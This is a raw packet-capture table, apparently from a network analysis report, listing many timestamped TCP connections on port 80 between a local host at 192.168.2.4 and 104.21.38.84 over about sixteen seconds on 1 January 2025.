                                                                                                                          Jan 1, 2025 04:24:02.207045078 CET5016580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:02.207670927 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:02.212003946 CET8050165104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:02.212049961 CET5016580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:02.212538004 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:02.212594032 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:02.212703943 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:02.217494011 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:02.573437929 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:02.578341961 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:02.656440020 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:02.871794939 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:02.877602100 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:02.912259102 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.008074999 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.107445002 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.108414888 CET5016780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.183229923 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.183243990 CET8050167104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.183374882 CET8050166104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.185970068 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.186007977 CET5016780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.186033964 CET5016680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.204504967 CET5016780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.209353924 CET8050167104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.429378033 CET5016780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.430970907 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.435843945 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.435902119 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.436055899 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.440857887 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.475725889 CET8050167104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.556441069 CET5016980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.561269999 CET8050169104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.561319113 CET5016980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.561485052 CET5016980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.563618898 CET8050167104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.563659906 CET5016780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.566288948 CET8050169104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.787539005 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.792440891 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.792464972 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.880939960 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.912554979 CET5016980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:03.917433023 CET8050169104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:03.937308073 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.006129026 CET8050169104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.115502119 CET5016980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.151710987 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.266290903 CET8050169104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.363800049 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.365398884 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.392704964 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.392704964 CET5016980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.393563986 CET5017080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.397770882 CET8050168104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.397871017 CET5016880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.398041964 CET8050169104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.398397923 CET8050170104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.401602983 CET5016980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.401604891 CET5017080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.401705980 CET5017080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.406429052 CET8050170104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.756279945 CET5017080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:04.761171103 CET8050170104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:04.889657021 CET8050170104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.051526070 CET8050170104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.051637888 CET5017080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:05.173413992 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:05.178299904 CET8050171104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.181857109 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:05.181936026 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:05.186717033 CET8050171104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.537589073 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:05.542639017 CET8050171104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.634772062 CET8050171104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.678006887 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:05.803466082 CET8050171104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.892153978 CET8050171104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:05.892205000 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.018646002 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.019337893 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.023727894 CET8050171104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:06.023770094 CET5017180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.024230003 CET8050172104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:06.024280071 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.024431944 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.029238939 CET8050172104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:06.381211042 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.386823893 CET8050172104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:06.489260912 CET8050172104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:06.615511894 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:06.939554930 CET8050172104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:06.991786003 CET8050172104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:06.991930008 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.067265987 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.067750931 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.072901964 CET8050173104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.073112965 CET8050172104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.073156118 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.077931881 CET5017280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.078226089 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.083785057 CET8050173104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.428102970 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.433140993 CET8050173104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.523610115 CET8050173104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.568646908 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.728319883 CET8050173104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.813683033 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.846069098 CET5017080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.849495888 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.850426912 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.854532003 CET8050173104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.854589939 CET5017380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.855243921 CET8050174104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:07.855299950 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.855398893 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:07.860176086 CET8050174104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:08.209346056 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.214299917 CET8050174104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:08.331849098 CET8050174104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:08.474965096 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.588929892 CET8050174104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:08.681622982 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.704240084 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.705497980 CET5017580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.710364103 CET8050175104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:08.710628986 CET5017580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.710671902 CET5017580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.714816093 CET8050174104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:08.715054035 CET5017480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:08.715461969 CET8050175104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.068739891 CET5017580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.073615074 CET8050175104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.165596008 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.165600061 CET5017580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.170526981 CET8050176104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.170701027 CET8050175104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.170902014 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.170907974 CET5017580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.171032906 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.175806046 CET8050176104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.289262056 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.294291973 CET8050177104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.294353962 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.294435024 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.299251080 CET8050177104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.521847010 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.526740074 CET8050176104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.526843071 CET8050176104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.618263006 CET8050176104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.646823883 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.651694059 CET8050177104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.678023100 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.738975048 CET8050177104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.791076899 CET8050176104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:09.803035021 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:09.954786062 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.000561953 CET8050177104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.115510941 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.138997078 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.139053106 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.139929056 CET5017880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.144140959 CET8050176104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.144192934 CET5017680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.144479036 CET8050177104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.144522905 CET5017780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.144709110 CET8050178104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.144772053 CET5017880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.144901991 CET5017880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.149723053 CET8050178104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.493616104 CET5017880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.498532057 CET8050178104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.588922977 CET8050178104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.799437046 CET8050178104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.799637079 CET5017880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.925676107 CET5017980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.925682068 CET5017880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.930589914 CET8050179104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.930757999 CET8050178104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:10.930840969 CET5017880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.930922031 CET5017980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.931113005 CET5017980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:10.935902119 CET8050179104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:11.287502050 CET5017980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:11.294261932 CET8050179104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:11.372420073 CET8050179104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:11.428137064 CET5017980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:11.554343939 CET8050179104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:11.678019047 CET5017980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:11.688220024 CET5018080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:11.693089962 CET8050180104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:11.693151951 CET5018080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:11.693320990 CET5018080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:11.698141098 CET8050180104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:12.037460089 CET5018080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.042378902 CET8050180104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:12.137638092 CET8050180104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:12.303100109 CET5018080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.404870033 CET8050180104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:12.533565044 CET5018080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.533566952 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.538489103 CET8050181104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:12.538695097 CET8050180104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:12.539617062 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.539630890 CET5018080192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.539788961 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.544591904 CET8050181104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:12.899554968 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:12.904514074 CET8050181104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.166512966 CET8050181104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.219825983 CET8050181104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.223625898 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.272313118 CET8050181104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.272372961 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.393079996 CET5017980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.394357920 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.394978046 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.399373055 CET8050181104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.399434090 CET5018180192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.399825096 CET8050182104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.399923086 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.400084972 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.404885054 CET8050182104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.756218910 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:13.761148930 CET8050182104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:13.884690046 CET8050182104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.002620935 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.057848930 CET8050182104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.140620947 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.173238993 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.173958063 CET5018380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.178312063 CET8050182104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.178366899 CET5018280192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.178769112 CET8050183104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.178853035 CET5018380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.178965092 CET5018380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.183772087 CET8050183104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.537451029 CET5018380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.542495966 CET8050183104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.622608900 CET8050183104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.679358006 CET5018380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.803956032 CET8050183104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.804466963 CET5018380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.804553986 CET5018380192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.804804087 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.809587955 CET8050184104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.809724092 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.809782028 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.814558029 CET8050184104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.922796011 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.927587032 CET8050185104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:14.927700043 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.927819967 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:14.932553053 CET8050185104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.162647963 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.167563915 CET8050184104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.167627096 CET8050184104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.262156963 CET8050184104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.275366068 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.280251980 CET8050185104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.304965973 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.381606102 CET8050185104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.428018093 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.529172897 CET8050184104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.576142073 CET8050185104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.631145000 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.675061941 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.692811966 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.693041086 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.693933010 CET5018680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.698714018 CET8050184104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.698729038 CET8050186104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.698765993 CET5018480192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.698808908 CET5018680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.698928118 CET5018680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.699935913 CET8050185104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:15.699973106 CET5018580192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:15.703680992 CET8050186104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:16.053163052 CET5018680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:16.058134079 CET8050186104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:16.142728090 CET8050186104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:16.193646908 CET5018680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:16.411422968 CET8050186104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:16.459561110 CET5018680192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:16.537647963 CET5018780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:16.542505980 CET8050187104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:16.543698072 CET5018780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:16.543698072 CET5018780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:16.548511028 CET8050187104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:16.897108078 CET5018780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:16.901994944 CET8050187104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.016371965 CET8050187104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.069576979 CET5018780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:17.273262978 CET8050187104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.401568890 CET5018780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:17.402312040 CET5018880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:17.406699896 CET8050187104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.406754017 CET5018780192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:17.407190084 CET8050188104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.407248974 CET5018880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:17.407346964 CET5018880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:17.412148952 CET8050188104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.756233931 CET5018880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:17.761116028 CET8050188104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.855477095 CET8050188104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:17.896779060 CET5018880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:18.031869888 CET8050188104.21.38.84192.168.2.4
                                                                                                                          Jan 1, 2025 04:24:18.084278107 CET5018880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:18.160815001 CET5018880192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:18.161665916 CET5018980192.168.2.4104.21.38.84
                                                                                                                          Jan 1, 2025 04:24:18.167704105 CET8050188104.21.38.84192.168.2.4
